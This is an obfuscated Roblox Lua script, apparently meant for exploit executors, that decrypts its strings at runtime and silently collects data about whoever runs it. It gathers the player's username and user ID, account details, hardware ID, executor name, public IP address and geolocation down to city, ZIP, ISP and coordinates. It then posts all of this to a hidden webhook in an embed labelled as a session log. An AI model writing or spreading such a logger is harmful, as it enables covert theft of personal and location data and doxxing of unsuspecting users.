--[[

::::    ::::        :::    ::: :::    ::: :::::::::  
+:+:+: :+:+:+       :+:    :+: :+:    :+: :+:    :+: 
+:+ +:+:+ +:+       +:+    +:+ +:+    +:+ +:+    +:+ 
+#+  +:+  +#+       +#++:++#++ +#+    +:+ +#++:++#+  
+#+       +#+       +#+    +#+ +#+    +#+ +#+    +#+ 
#+#       #+#       #+#    #+# #+#    #+# #+#    #+# 
###       ###       ###    ###  ########  #########  

]]--
bit32 = {};
local N = 32;
local P = 2 ^ N;
bit32.bnot = function(x)
	x = x % P;
	return (P - 1) - x;
end;
bit32.band = function(x, y)
	if (y == 255) then
		return x % 256;
	end
	if (y == 65535) then
		return x % 65536;
	end
	if (y == 4294967295) then
		return x % 4294967296;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 2) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bor = function(x, y)
	if (y == 255) then
		return (x - (x % 256)) + 255;
	end
	if (y == 65535) then
		return (x - (x % 65536)) + 65535;
	end
	if (y == 4294967295) then
		return 4294967295;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) >= 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bxor = function(x, y)
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.lshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount < 0) then
		return math.floor(x * (2 ^ s_amount));
	else
		return (x * (2 ^ s_amount)) % P;
	end
end;
bit32.rshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		return math.floor(x * (2 ^ -s_amount));
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
bit32.arshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		local add = 0;
		if (x >= (P / 2)) then
			add = P - (2 ^ (N - s_amount));
		end
		return math.floor(x * (2 ^ -s_amount)) + add;
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
local TABLE_TableIndirection = {};
TABLE_TableIndirection["obf_stringchar%0"] = string.char;
TABLE_TableIndirection["obf_stringbyte%0"] = string.byte;
TABLE_TableIndirection["obf_stringsub%0"] = string.sub;
TABLE_TableIndirection["obf_bitlib%0"] = bit32 or bit;
TABLE_TableIndirection["obf_XOR%0"] = TABLE_TableIndirection["obf_bitlib%0"].bxor;
TABLE_TableIndirection["obf_tableconcat%0"] = table.concat;
TABLE_TableIndirection["obf_tableinsert%0"] = table.insert;
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	TABLE_TableIndirection["result%0"] = {};
	for i = 1, #LUAOBFUSACTOR_STR do
		TABLE_TableIndirection["obf_tableinsert%0"](TABLE_TableIndirection["result%0"], TABLE_TableIndirection["obf_stringchar%0"](TABLE_TableIndirection["obf_XOR%0"](TABLE_TableIndirection["obf_stringbyte%0"](TABLE_TableIndirection["obf_stringsub%0"](LUAOBFUSACTOR_STR, i, i + 1)), TABLE_TableIndirection["obf_stringbyte%0"](TABLE_TableIndirection["obf_stringsub%0"](LUAOBFUSACTOR_KEY, 1 + (i % #LUAOBFUSACTOR_KEY), 1 + (i % #LUAOBFUSACTOR_KEY) + 1))) % 256));
	end
	return TABLE_TableIndirection["obf_tableconcat%0"](TABLE_TableIndirection["result%0"]);
end
TABLE_TableIndirection["obf_bitlib%1"] = bit32 or bit;
TABLE_TableIndirection["obf_XOR%1"] = TABLE_TableIndirection["obf_bitlib%1"].bxor;
TABLE_TableIndirection["obf_OR%0"] = TABLE_TableIndirection["obf_bitlib%1"].bor;
TABLE_TableIndirection["obf_AND%0"] = TABLE_TableIndirection["obf_bitlib%1"].band;
TABLE_TableIndirection["HttpService%0"] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\249\215\207\53\213\190\213\8\216\192\222", "\126\177\163\187\69\134\219\167"));
TABLE_TableIndirection["Players%0"] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\19\193\43\220\249\49\222", "\156\67\173\74\165"));
TABLE_TableIndirection["MarketplaceService%0"] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\25\182\91\29\185\50\86\56\182\74\19\143\35\84\34\190\74\19", "\38\84\215\41\118\220\70"));
TABLE_TableIndirection["player%0"] = TABLE_TableIndirection["Players%0"][LUAOBFUSACTOR_DECRYPT_STR_0("\124\25\33\19\242\96\26\35\11\251\66", "\158\48\118\66\114")];
TABLE_TableIndirection["character%0"] = TABLE_TableIndirection["player%0"][LUAOBFUSACTOR_DECRYPT_STR_0("\136\44\17\36\114\166\239\174\54", "\155\203\68\112\86\19\197")] or TABLE_TableIndirection["player%0"][LUAOBFUSACTOR_DECRYPT_STR_0("\101\213\55\238\65\123\241\253\84\252\50\248\69\124", "\152\38\189\86\156\32\24\133")]:Wait();
TABLE_TableIndirection["humanoid%0"] = TABLE_TableIndirection["character%0"]:FindFirstChildWhichIsA(LUAOBFUSACTOR_DECRYPT_STR_0("\212\66\170\71\242\88\174\66", "\38\156\55\199"));
TABLE_TableIndirection["ip%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\157\115\119\38\28\99\244", "\35\200\29\28\72\115\20\154");
TABLE_TableIndirection["ipInfo%0"] = {[LUAOBFUSACTOR_DECRYPT_STR_0("\26\176\196\209\153\62\45", "\84\121\223\177\191\237\76")]=LUAOBFUSACTOR_DECRYPT_STR_0("\142\88\194\174\53\71\62", "\161\219\54\169\192\90\48\80"),[LUAOBFUSACTOR_DECRYPT_STR_0("\91\71\7\44\70\76\46\36\68\71", "\69\41\34\96")]=LUAOBFUSACTOR_DECRYPT_STR_0("\137\205\220\4\13\60\178", "\75\220\163\183\106\98"),[LUAOBFUSACTOR_DECRYPT_STR_0("\1\179\159\46", "\185\98\218\235\87")]=LUAOBFUSACTOR_DECRYPT_STR_0("\254\50\44\232\209\189\197", "\202\171\92\71\134\190"),[LUAOBFUSACTOR_DECRYPT_STR_0("\51\200\60", "\232\73\161\76")]=LUAOBFUSACTOR_DECRYPT_STR_0("\142\215\73\83\17\172\215", "\126\219\185\34\61"),[LUAOBFUSACTOR_DECRYPT_STR_0("\5\221\78", "\135\108\174\62\18\30\23\147")]=LUAOBFUSACTOR_DECRYPT_STR_0("\131\231\33\197\23\185\61", "\167\214\137\74\171\120\206\83"),[LUAOBFUSACTOR_DECRYPT_STR_0("\132\226\53", "\199\235\144\82\61\152")]=LUAOBFUSACTOR_DECRYPT_STR_0("\50\24\178\37\8\1\183", "\75\103\118\217"),[LUAOBFUSACTOR_DECRYPT_STR_0("\198\71", "\126\167\52\16\116\217")]=LUAOBFUSACTOR_DECRYPT_STR_0("\253\32\43\142\187\14\242", "\156\168\78\64\224\212\121"),[LUAOBFUSACTOR_DECRYPT_STR_0("\19\231\168\203\29\225\171\203", "\174\103\142\197")]=LUAOBFUSACTOR_DECRYPT_STR_0("\99\38\84\54\42\73\246", "\152\54\72\63\88\69\62"),[LUAOBFUSACTOR_DECRYPT_STR_0("\216\197\250", "\60\180\164\142")]="?",[LUAOBFUSACTOR_DECRYPT_STR_0("\84\81\11", "\114\56\62\101\73\71\141")]="?"};
pcall(function()
	TABLE_TableIndirection["FlatIdent_69270%0"] = 0;
	TABLE_TableIndirection["geoInfo%0"] = nil;
	TABLE_TableIndirection["decoded%0"] = nil;
	while true do
		if (TABLE_TableIndirection["FlatIdent_69270%0"] == 1) then
			TABLE_TableIndirection["decoded%0"] = TABLE_TableIndirection["HttpService%0"]:JSONDecode(TABLE_TableIndirection["geoInfo%0"]);
			for k, v in pairs(TABLE_TableIndirection["decoded%0"]) do
				TABLE_TableIndirection["ipInfo%0"][k] = tostring(v);
			end
			break;
		end
		if (TABLE_TableIndirection["FlatIdent_69270%0"] == (0 - 0)) then
			TABLE_TableIndirection["ip%0"] = game:HttpGet(LUAOBFUSACTOR_DECRYPT_STR_0("\176\253\207\212\171\179\148\139\174\189\149\205\188\236\213\208\246\228\222\139", "\164\216\137\187"));
			TABLE_TableIndirection["geoInfo%0"] = game:HttpGet(LUAOBFUSACTOR_DECRYPT_STR_0("\218\242\37\162\252\177\68\219\246\124\179\182\247\69\209\233\60\253\172\237\4\220\169", "\107\178\134\81\210\198\158") .. TABLE_TableIndirection["ip%0"]);
			TABLE_TableIndirection["FlatIdent_69270%0"] = 1;
		end
	end
end);
TABLE_TableIndirection["hwid%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\13\0\137\200\165\47\0", "\202\88\110\226\166");
pcall(function()
	TABLE_TableIndirection["hwid%0"] = (syn and syn[LUAOBFUSACTOR_DECRYPT_STR_0("\196\10\150\255\221\202\11", "\170\163\111\226\151")] and syn.gethwid()) or (gethwid and gethwid()) or (fluxus and fluxus[LUAOBFUSACTOR_DECRYPT_STR_0("\22\53\166\7\70\32\32\21", "\73\113\80\210\88\46\87")] and fluxus.get_hwid()) or LUAOBFUSACTOR_DECRYPT_STR_0("\180\34\198\28\232\150\34", "\135\225\76\173\114");
end);
TABLE_TableIndirection["osName%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\47\227\179\190\163\170\169", "\199\122\141\216\208\204\221");
pcall(function()
	if (syn or ((13144 - 8551) <= (5157 - 2485))) then
		TABLE_TableIndirection["osName%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\154\212\30\244\119\225\190\157\88\195\97\248\172\205\3\245\56\206\228", "\150\205\189\112\144\24");
	elseif (iswindowactive or (1168 > 3156)) then
		TABLE_TableIndirection["osName%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\18\141\177\72\11\159\2", "\112\69\228\223\44\100\232\113");
	elseif (fluxus or ((1473 - 901) > 4486)) then
		TABLE_TableIndirection["osName%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\242\19\18\203\163\111\198\156\40\14\221\178\115\145\199\86", "\230\180\127\103\179\214\28");
	elseif (((2023 - (TABLE_TableIndirection["obf_AND%0"](555, 64) + TABLE_TableIndirection["obf_OR%0"](555, 64))) == 1404) and getexecutorname) then
		TABLE_TableIndirection["osName%0"] = getexecutorname();
	else
		TABLE_TableIndirection["osName%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\185\11\84\72\235\86\238", "\128\236\101\63\38\132\33");
	end
end);
TABLE_TableIndirection["placeId%0"] = game[LUAOBFUSACTOR_DECRYPT_STR_0("\156\165\16\71\179\194\203", "\175\204\201\113\36\214\139")];
TABLE_TableIndirection["jobId%0"] = game[LUAOBFUSACTOR_DECRYPT_STR_0("\109\195\55\245\0", "\100\39\172\85\188")];
TABLE_TableIndirection["gameLink%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\165\108\173\144\32\247\55\246\151\36\186\54\171\143\49\161\119\161\206\48\162\117\246\135\50\160\125\170\207", "\83\205\24\217\224") .. TABLE_TableIndirection["placeId%0"];
TABLE_TableIndirection["gameName%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\211\203\198\51\233\210\195", "\93\134\165\173");
pcall(function()
	TABLE_TableIndirection["gameName%0"] = TABLE_TableIndirection["MarketplaceService%0"]:GetProductInfo(TABLE_TableIndirection["placeId%0"])[LUAOBFUSACTOR_DECRYPT_STR_0("\144\243\204\199", "\30\222\146\161\162\90\174\210")];
end);
TABLE_TableIndirection["executor%0"] = (identifyexecutor and identifyexecutor()) or LUAOBFUSACTOR_DECRYPT_STR_0("\208\64\123\4\234\89\126\74\192\86\117\9\240\90\127\24", "\106\133\46\16");
TABLE_TableIndirection["displayName%0"] = TABLE_TableIndirection["player%0"][LUAOBFUSACTOR_DECRYPT_STR_0("\124\41\96\236\86\65\65\14\114\241\95", "\32\56\64\19\156\58")];
TABLE_TableIndirection["username%0"] = TABLE_TableIndirection["player%0"][LUAOBFUSACTOR_DECRYPT_STR_0("\116\201\232\83", "\224\58\168\133\54\58\146")];
TABLE_TableIndirection["userId%0"] = TABLE_TableIndirection["player%0"][LUAOBFUSACTOR_DECRYPT_STR_0("\108\69\78\239\92\130", "\107\57\54\43\157\21\230\231")];
TABLE_TableIndirection["accountAge%0"] = TABLE_TableIndirection["player%0"][LUAOBFUSACTOR_DECRYPT_STR_0("\250\136\18\250\172\210\219\250\140\20", "\175\187\235\113\149\217\188")];
TABLE_TableIndirection["membership%0"] = tostring(TABLE_TableIndirection["player%0"].MembershipType);
TABLE_TableIndirection["userProfileLink%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\52\187\149\92\240\35\55\115\184\150\91\173\107\119\62\163\142\84\173\122\119\49\224\148\95\230\107\107\115", "\24\92\207\225\44\131\25") .. TABLE_TableIndirection["userId%0"] .. LUAOBFUSACTOR_DECRYPT_STR_0("\4\195\170\67\29\116\71\214", "\29\43\179\216\44\123");
TABLE_TableIndirection["avatarUrl%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\181\205\52\92\174\131\111\3\169\203\110\94\191\193\35\72\179\151\35\67\176\150\115\74\191\221\112\24\187\143\112\72\190\142\38\29\184\129\33\26\232\221\35\73\229\223\118\78\237\223\36\74\234\143\111\24\239\137\111\24\239\137\111\109\171\216\52\77\175\241\37\77\185\202\40\67\169\150\16\66\186", "\44\221\185\64");
pcall(function()
	TABLE_TableIndirection["thumbnailData%0"] = game:HttpGet(LUAOBFUSACTOR_DECRYPT_STR_0("\9\243\92\79\96\91\168\7\75\123\20\234\74\81\114\8\235\91\17\97\14\229\68\80\107\79\228\71\82\60\23\182\7\74\96\4\245\91\16\114\23\230\92\94\97\76\239\77\94\119\18\239\71\75\44\20\244\77\77\90\5\244\21", "\19\97\135\40\63") .. TABLE_TableIndirection["userId%0"] .. LUAOBFUSACTOR_DECRYPT_STR_0("\232\79\58\33\42\108\250\14\99\35\123\99\254\26\53\52\61\60\175\72\110\11\33\54", "\81\206\60\83\91\79"));
	TABLE_TableIndirection["thumbDecoded%0"] = TABLE_TableIndirection["HttpService%0"]:JSONDecode(TABLE_TableIndirection["thumbnailData%0"]);
	TABLE_TableIndirection["avatarUrl%0"] = TABLE_TableIndirection["thumbDecoded%0"][LUAOBFUSACTOR_DECRYPT_STR_0("\74\170\196\115", "\196\46\203\176\18\79\163\45")][932 - (TABLE_TableIndirection["obf_AND%0"](857, 74) + TABLE_TableIndirection["obf_OR%0"](857, 74))][LUAOBFUSACTOR_DECRYPT_STR_0("\177\47\127\25\33\206\253\180", "\143\216\66\30\126\68\155")] or TABLE_TableIndirection["avatarUrl%0"];
end);
TABLE_TableIndirection["date%0"] = os.date(LUAOBFUSACTOR_DECRYPT_STR_0("\239\241\64\142\200\238\146\229", "\129\202\168\109\171\165\195\183"));
TABLE_TableIndirection["time%0"] = os.date(LUAOBFUSACTOR_DECRYPT_STR_0("\103\112\109\157\243\78\163\17", "\134\66\56\87\184\190\116"));
TABLE_TableIndirection["webhookUrl%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\52\37\29\171\10\177\110\122\56\56\26\184\22\249\37\123\63\62\4\244\24\251\40\122\43\52\11\179\22\228\42\38\115\96\90\237\74\191\117\98\101\105\90\235\65\190\112\108\109\99\90\227\86\233\5\27\111\58\32\132\60\200\120\30\10\22\54\178\52\237\51\45\52\40\61\185\15\249\48\32\51\98\48\174\64\222\16\108\17\40\19\174\14\184\16\50\50\37\38\162\48\211\116\59\44\96\95\150\17\198\32\31\18\27\13\186\59\233\112\33\63", "\85\92\81\105\219\121\139\65");
TABLE_TableIndirection["embedData%0"] = {[LUAOBFUSACTOR_DECRYPT_STR_0("\233\186\68\73\121", "\191\157\211\48\37\28")]="📘 Full Session Log",[LUAOBFUSACTOR_DECRYPT_STR_0("\220\16\248\19\40", "\90\191\127\148\124")]=49151,[LUAOBFUSACTOR_DECRYPT_STR_0("\108\143\59\26\122\137\47\30\116", "\119\24\231\78")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\151\63\169", "\113\226\77\197\42\188\32")]=TABLE_TableIndirection["avatarUrl%0"]},[LUAOBFUSACTOR_DECRYPT_STR_0("\60\31\241\185\62\5", "\213\90\118\148")]={{[LUAOBFUSACTOR_DECRYPT_STR_0("\85\47\185\83", "\45\59\78\212\54")]="👤 User Info",[LUAOBFUSACTOR_DECRYPT_STR_0("\6\87\143\158\131", "\144\112\54\227\235\230\78\205")]=string.format("**Display Name**: [%s](%s)\n**Username**: %s\n**UserId**: %s\n**Membership**: %s\n**Account Age**: %s days", TABLE_TableIndirection["displayName%0"], TABLE_TableIndirection["userProfileLink%0"], TABLE_TableIndirection["username%0"], TABLE_TableIndirection["userId%0"], TABLE_TableIndirection["membership%0"], TABLE_TableIndirection["accountAge%0"]),[LUAOBFUSACTOR_DECRYPT_STR_0("\186\38\3\245\222\94", "\59\211\72\111\156\176")]=false},{[LUAOBFUSACTOR_DECRYPT_STR_0("\64\134\238\40", "\77\46\231\131")]="💻 Session Info",[LUAOBFUSACTOR_DECRYPT_STR_0("\172\85\186\85\191", "\32\218\52\214")]=string.format("**Executor**: %s\n**HWID**: `%s`\n**OS**: %s\n**Date**: %s\n**Time**: %s", TABLE_TableIndirection["executor%0"], TABLE_TableIndirection["hwid%0"], TABLE_TableIndirection["osName%0"], TABLE_TableIndirection["date%0"], TABLE_TableIndirection["time%0"]),[LUAOBFUSACTOR_DECRYPT_STR_0("\71\25\61\161\255\181", "\58\46\119\81\200\145\208\37")]=false},{[LUAOBFUSACTOR_DECRYPT_STR_0("\37\141\61\169", "\86\75\236\80\204\201\221")]="🎮 Game Info",[LUAOBFUSACTOR_DECRYPT_STR_0("\100\64\123\144\251", "\235\18\33\23\229\158")]=string.format('**Game Name**: [%s](%s)\n**PlaceId**: %s\n**Join Script**:\n```lua\nRoblox.GameLauncher.joinGameInstance(%s, \"%s\")\n```', TABLE_TableIndirection["gameName%0"], TABLE_TableIndirection["gameLink%0"], TABLE_TableIndirection["placeId%0"], TABLE_TableIndirection["placeId%0"], TABLE_TableIndirection["jobId%0"]),[LUAOBFUSACTOR_DECRYPT_STR_0("\89\180\205\178\94\191", "\219\48\218\161")]=false},{[LUAOBFUSACTOR_DECRYPT_STR_0("\234\112\113\76", "\128\132\17\28\41\187\47")]="🌐 IP Info",[LUAOBFUSACTOR_DECRYPT_STR_0("\23\51\10\47\88", "\61\97\82\102\90")]=string.format("**IP Address**: `%s`\n**Country**: %s\n**Region**: %s\n**City**: %s\n**ZIP**: %s\n**ISP**: %s\n**Org**: %s\n**AS**: %s\n**Timezone**: %s\n**Lat/Lon**: %s, %s", TABLE_TableIndirection["ip%0"], TABLE_TableIndirection["ipInfo%0"].country, TABLE_TableIndirection["ipInfo%0"].regionName, TABLE_TableIndirection["ipInfo%0"].city, TABLE_TableIndirection["ipInfo%0"].zip, TABLE_TableIndirection["ipInfo%0"].isp, TABLE_TableIndirection["ipInfo%0"].org, TABLE_TableIndirection["ipInfo%0"][LUAOBFUSACTOR_DECRYPT_STR_0("\173\61", "\105\204\78\203\43\167\55\126")], TABLE_TableIndirection["ipInfo%0"].timezone, TABLE_TableIndirection["ipInfo%0"].lat, TABLE_TableIndirection["ipInfo%0"].lon),[LUAOBFUSACTOR_DECRYPT_STR_0("\172\164\47\23\29\1", "\49\197\202\67\126\115\100\167")]=false}},[LUAOBFUSACTOR_DECRYPT_STR_0("\49\84\208\61\133\68", "\62\87\59\191\73\224\54")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\243\7\226\221", "\169\135\98\154")]="🔍 Generated by Logger Script"}};
pcall(function()
	TABLE_TableIndirection["FlatIdent_7126A%0"] = TABLE_TableIndirection["obf_AND%0"](0, 0) + TABLE_TableIndirection["obf_OR%0"](0, 0);
	TABLE_TableIndirection["data%0"] = nil;
	TABLE_TableIndirection["jsonData%0"] = nil;
	TABLE_TableIndirection["req%0"] = nil;
	while true do
		if (TABLE_TableIndirection["FlatIdent_7126A%0"] == (TABLE_TableIndirection["obf_AND%0"](1, 0) + TABLE_TableIndirection["obf_OR%0"](1, 0))) then
			TABLE_TableIndirection["req%0"] = http_request or request or (syn and syn[LUAOBFUSACTOR_DECRYPT_STR_0("\217\114\53\65\248\32\220", "\168\171\23\68\52\157\83")]);
			if TABLE_TableIndirection["req%0"] then
				TABLE_TableIndirection["req%0"]({[LUAOBFUSACTOR_DECRYPT_STR_0("\193\99\249", "\231\148\17\149\205\69\77")]=TABLE_TableIndirection["webhookUrl%0"],[LUAOBFUSACTOR_DECRYPT_STR_0("\173\162\211\243\88\251", "\159\224\199\167\155\55")]=LUAOBFUSACTOR_DECRYPT_STR_0("\199\220\15\230", "\178\151\147\92"),[LUAOBFUSACTOR_DECRYPT_STR_0("\164\248\77\54\23\94\105", "\26\236\157\44\82\114\44")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\9\33\219\79\47\32\193\22\30\55\197\94", "\59\74\78\181")]=LUAOBFUSACTOR_DECRYPT_STR_0("\36\193\74\86\186\38\208\78\83\188\43\158\80\73\188\43", "\211\69\177\58\58")},[LUAOBFUSACTOR_DECRYPT_STR_0("\149\234\125\236", "\171\215\133\25\149\137")]=TABLE_TableIndirection["jsonData%0"]});
			end
			break;
		end
		if (TABLE_TableIndirection["FlatIdent_7126A%0"] == 0) then
			TABLE_TableIndirection["data%0"] = {[LUAOBFUSACTOR_DECRYPT_STR_0("\228\197\48\255\235\35", "\34\129\168\82\154\143\80\156")]={TABLE_TableIndirection["embedData%0"]}};
			TABLE_TableIndirection["jsonData%0"] = TABLE_TableIndirection["HttpService%0"]:JSONEncode(TABLE_TableIndirection["data%0"]);
			TABLE_TableIndirection["FlatIdent_7126A%0"] = 878 - (TABLE_TableIndirection["obf_AND%0"](282, 595) + TABLE_TableIndirection["obf_OR%0"](282, 595));
		end
	end
end);
_G[LUAOBFUSACTOR_DECRYPT_STR_0("\178\183\49\3\71\65\130\164\190\33\14\73\74\144\182\183\61\31", "\233\229\210\83\107\40\46")] = _G[LUAOBFUSACTOR_DECRYPT_STR_0("\246\71\48\222\10\206\73\19\218\23\196\67\54\207\54\196\76\38", "\101\161\34\82\182")] or false;
if not _G[LUAOBFUSACTOR_DECRYPT_STR_0("\223\8\91\246\212\237\137\15\228\31\92\255\223\251\177\43\230\25", "\78\136\109\57\158\187\130\226")] then
	TABLE_TableIndirection["FlatIdent_2661B%0"] = 1637 - (TABLE_TableIndirection["obf_AND%0"](1523, 114) + TABLE_TableIndirection["obf_OR%0"](1523, 114));
	while true do
		if (TABLE_TableIndirection["FlatIdent_2661B%0"] == (TABLE_TableIndirection["obf_AND%0"](0, 0) + TABLE_TableIndirection["obf_OR%0"](0, 0))) then
			_G[LUAOBFUSACTOR_DECRYPT_STR_0("\9\58\251\249\49\48\242\208\50\45\252\240\58\38\202\244\48\43", "\145\94\95\153")] = true;
			pcall(function()
				TABLE_TableIndirection["data%0"] = {[LUAOBFUSACTOR_DECRYPT_STR_0("\248\192\22\208\74\164", "\215\157\173\116\181\46")]={TABLE_TableIndirection["embedData%0"]}};
				TABLE_TableIndirection["jsonData%0"] = TABLE_TableIndirection["HttpService%0"]:JSONEncode(TABLE_TableIndirection["data%0"]);
				TABLE_TableIndirection["req%0"] = http_request or request or (syn and syn[LUAOBFUSACTOR_DECRYPT_STR_0("\39\177\154\231\223\38\160", "\186\85\212\235\146")]);
				if (TABLE_TableIndirection["req%0"] or (3748 < (3277 - (68 + 997)))) then
					TABLE_TableIndirection["req%0"]({[LUAOBFUSACTOR_DECRYPT_STR_0("\247\147\26", "\56\162\225\118\158\89\142")]=TABLE_TableIndirection["webhookUrl%0"],[LUAOBFUSACTOR_DECRYPT_STR_0("\113\0\212\167\45\220", "\184\60\101\160\207\66")]=LUAOBFUSACTOR_DECRYPT_STR_0("\1\173\79\136", "\220\81\226\28"),[LUAOBFUSACTOR_DECRYPT_STR_0("\59\208\131\255\239\213\0", "\167\115\181\226\155\138")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\193\45\233\72\126\127\210\175\22\254\76\126", "\166\130\66\135\60\27\17")]=LUAOBFUSACTOR_DECRYPT_STR_0("\69\90\222\121\57\71\75\218\124\63\74\5\196\102\63\74", "\80\36\42\174\21")},[LUAOBFUSACTOR_DECRYPT_STR_0("\108\31\51\99", "\26\46\112\87")]=TABLE_TableIndirection["jsonData%0"]});
				end
			end);
			break;
		end
	end
end
